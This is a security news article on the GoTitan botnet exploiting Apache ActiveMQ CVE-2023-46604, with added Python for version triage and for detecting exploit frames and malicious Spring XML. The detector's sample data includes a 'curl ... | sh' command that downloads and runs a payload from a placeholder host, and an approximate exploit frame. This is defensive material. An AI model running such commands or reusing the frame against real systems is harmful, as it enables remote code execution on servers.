GoTitan Botnet Actively Exploiting Apache ActiveMQ Vulnerability


Attackers are exploiting the recently disclosed critical vulnerability in Apache ActiveMQ, tracked as CVE-2023-46604, to deliver GoTitan, a botnet written in Go, and PrCtrl Rat, a .NET remote access trojan that lets the operator control the infected host.

Apache ActiveMQ releases earlier than 5.15.16, 5.16.7, 5.17.6 and 5.18.3 are affected by this critical vulnerability, regardless of the host operating system.
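Because the fix landed on four separate release branches, a plain "older than" comparison against a single version gets the answer wrong for branches like 5.16.x. The following Python is an added example (not code from the article, Fortinet or the Apache project) that classifies a version string against the branch-specific fixed releases listed above; the treatment of branches newer than 5.18 as unaffected and the sample inventory are assumptions of the example.

```python
"""Added example (not from the article, Fortinet or the Apache project):
classify an Apache ActiveMQ version string against the fixed releases named
in the advisory for CVE-2023-46604."""
import re

# First fixed release on each affected branch. A release on one of these
# branches is affected if it is older than the listed version.
FIXED_VERSIONS = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}
OLDEST_FIXED_BRANCH = min(FIXED_VERSIONS)


def parse_version(text):
    """Return (major, minor, patch) from strings such as '5.17.4' or
    'ActiveMQ/5.16.5-SNAPSHOT' (the form seen in banners and inventories).
    Raises ValueError when no dotted version is present."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not match:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(part) for part in match.groups())


def is_vulnerable(text):
    """True when the version is older than the first fixed release on its
    branch. Branches older than 5.15 never received a fix and are treated as
    affected; branches newer than 5.18 post-date the fix and are treated as
    not affected (an assumption of this example, not a statement from the
    advisory)."""
    version = parse_version(text)
    branch = version[:2]
    if branch in FIXED_VERSIONS:
        return version < FIXED_VERSIONS[branch]
    return branch < OLDEST_FIXED_BRANCH


def triage(inventory):
    """Map each host to its status for a constructed inventory of
    {host: version-string}; unparsable entries are reported as 'unknown'."""
    result = {}
    for host, banner in inventory.items():
        try:
            result[host] = "vulnerable" if is_vulnerable(banner) else "fixed"
        except ValueError:
            result[host] = "unknown"
    return result


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = {
        "mq-prod-1": "ActiveMQ/5.17.4",
        "mq-prod-2": "5.18.3",
        "mq-legacy": "5.14.5",
        "mq-unknown": "n/a",
    }
    for host, status in triage(sample).items():
        print(f"{host}: {status}")
```

Feed it the version strings from your asset inventory or broker banners; anything reported as "vulnerable" or "unknown" needs a closer look.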

Apache published an advisory for CVE-2023-46604 in October. The flaw is a deserialization of untrusted data in ActiveMQ's OpenWire protocol that lets a remote attacker with network access to the broker run arbitrary code.

Because of the severity of the flaw and the exploitation observed in the wild, CISA added CVE-2023-46604 to its Known Exploited Vulnerabilities (KEV) Catalog on November 2.



GoTitan Botnet – Ongoing Exploitation on Apache ActiveMQ

In this case, the attacker sends a crafted OpenWire packet that causes the broker to unmarshal a class of the attacker's choosing.

That class is pointed at an XML file hosted on an attacker-controlled server, so the vulnerable broker fetches and loads a class configuration (a Spring bean definition) from the remote URL.

The malicious XML defines the code to run on the compromised host: a bean that spawns a process whose constructor arguments are the shell command, for example "cmd" on Windows or "bash" on Linux. This gives the attacker arbitrary code execution on the vulnerable server.
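Both halves of the chain leave an artifact that defenders can match on: the crafted OpenWire frame carries the name of the Spring class used in public exploitation plus the URL the broker will fetch, and the remote XML names a process-spawning bean with the command line in its constructor arguments. The following Python is an added example (not code from the article, Fortinet or the Apache project) that implements both checks; the frame bytes, the XML document and the 203.0.113.0/24 addresses are constructed for the example, and the frame is an approximation of the real encoding rather than a captured packet.

```python
"""Added example (not from the article, Fortinet or the Apache project):
detection logic for the two artifacts described above, the OpenWire frame
that names the Spring class used in public exploitation and the remote
Spring bean XML that spawns a shell. Sample inputs are constructed."""
import re
import struct
import xml.etree.ElementTree as ET

# Class name carried in the crafted OpenWire packet; it is the indicator
# most network signatures for CVE-2023-46604 key on.
SPRING_CONTEXT_CLASS = b"org.springframework.context.support.ClassPathXmlApplicationContext"

# Bean classes that turn a Spring XML file into code execution.
COMMAND_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime"}


def scan_openwire_payload(payload):
    """Return the http(s) URLs in a suspected exploit frame, or [] when the
    frame does not reference the Spring context class. The URL is what the
    broker would fetch, so it is worth extracting for blocking and hunting."""
    if SPRING_CONTEXT_CLASS not in payload:
        return []
    return [u.decode("ascii") for u in re.findall(rb"https?://[\x21-\x7e]+", payload)]


def _local(tag):
    """Strip the XML namespace so namespaced and bare <bean> elements match."""
    return tag.rsplit("}", 1)[-1]


def find_command_beans(xml_bytes):
    """Parse a Spring bean definition and report beans whose class can spawn a
    process, with the command-line values found in their constructor args."""
    root = ET.fromstring(xml_bytes)  # stdlib parser; does not fetch external entities
    findings = []
    for element in root.iter():
        if _local(element.tag) != "bean":
            continue
        cls = element.get("class", "")
        if cls not in COMMAND_CLASSES:
            continue
        argv = [v.text for v in element.iter() if _local(v.tag) == "value" and v.text]
        findings.append({
            "id": element.get("id"),
            "class": cls,
            "init_method": element.get("init-method"),
            "argv": argv,
        })
    return findings


def _openwire_string(s):
    """OpenWire-style length-prefixed string (big-endian 16-bit length)."""
    return struct.pack(">H", len(s)) + s


# Constructed approximation of the crafted ExceptionResponse frame (command
# type 0x1f), enough to exercise the scanner; not a byte-exact capture.
SAMPLE_URL = b"http://203.0.113.10/poc.xml"
SAMPLE_BODY = b"\x1f" + b"\x00" * 4 + _openwire_string(SPRING_CONTEXT_CLASS) + _openwire_string(SAMPLE_URL)
SAMPLE_FRAME = struct.pack(">I", len(SAMPLE_BODY)) + SAMPLE_BODY

# Constructed sample of the remote XML the frame points at.
SAMPLE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <value>curl -s http://203.0.113.10/main-linux-amd64s | sh</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
"""

if __name__ == "__main__":
    print("frame URLs:", scan_openwire_payload(SAMPLE_FRAME))
    for f in find_command_beans(SAMPLE_XML):
        print(f"bean {f['id']} ({f['class']}, init={f['init_method']}): {f['argv']}")
```

The frame scanner is deliberately a substring heuristic: OpenWire marshals the throwable class name as a plain length-prefixed string, so matching on the class name catches the crafted packet without a full protocol parser, and the extracted URL doubles as a blocklist and hunting indicator. The XML check is the complement for files recovered from a proxy cache or the attacker's server.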

Malicious XML files

Fortinet researchers identified GoTitan, a new botnet written in Go, this month. It is retrieved from the malicious URL hxxp://91.92.242.14/main-linux-amd64s. The malware performs several checks before running, and the attacker only serves binaries for x86-64 systems.

It also writes a file named "c.log" containing the program status and execution time. This appears to be a developer's debug log, which suggests that GoTitan is still in an early stage of development.

The malware then retrieves its C2 IP address and gathers basic facts about the compromised endpoint, such as CPU details, memory and architecture.

C2 traffic session for GoTitan

“GoTitan communicates with its C2 server by sending ‘\xFE\xFE’ as a heartbeat signal and waiting for further instructions. When it receives a command, it passes it to a function named ‘handle_socket_func2’ that determines an attack method,” the researchers explain.

GoTitan can launch distributed denial-of-service (DDoS) attacks using ten distinct methods, including TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD and HTTP PUT floods.

The researchers also observed more established malware and tooling being delivered through the same flaw, including Sliver, Kinsing and Ddostf.

Upgrading to a fixed ActiveMQ release, restricting network access to the broker's OpenWire port (61616 by default), and continuously monitoring security advisories remain the essential steps to reduce the risk of exploitation.



